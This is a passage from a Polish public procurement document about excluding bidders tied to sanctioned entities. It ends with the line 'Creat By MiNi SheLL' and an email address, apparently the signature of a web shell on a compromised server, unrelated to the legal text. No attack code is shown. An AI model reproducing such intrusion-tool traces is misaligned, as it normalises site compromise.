Pzp; <br/>3)	Wykonawcę , którego jednostką dominującą w rozumieniu art. 3 ust 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021r. poz 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych <br/>w Rozporządzeniu Rady (WE) 765/2006 i Rozporządzeniu (UE) 269/2014 albo wpisana na listę lub będącą taka jednostka dominującą od dnia 24 lutego 2022r., o ile został wpisany na listę prowadzoną przez ministra właściwego do spraw wewnętrznych na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu wykluczenia z postępowania o zamówienie publiczne na podstawie ustawy Pzp; <br/>3.	W przypadku wykonawcy wykluczonego na podst. ust. 2 pkt 1),2),3) Zamawiający odrzuca ofertę takiego wykonawcy;

Creat By MiNi SheLL
Email: jattceo@gmail.com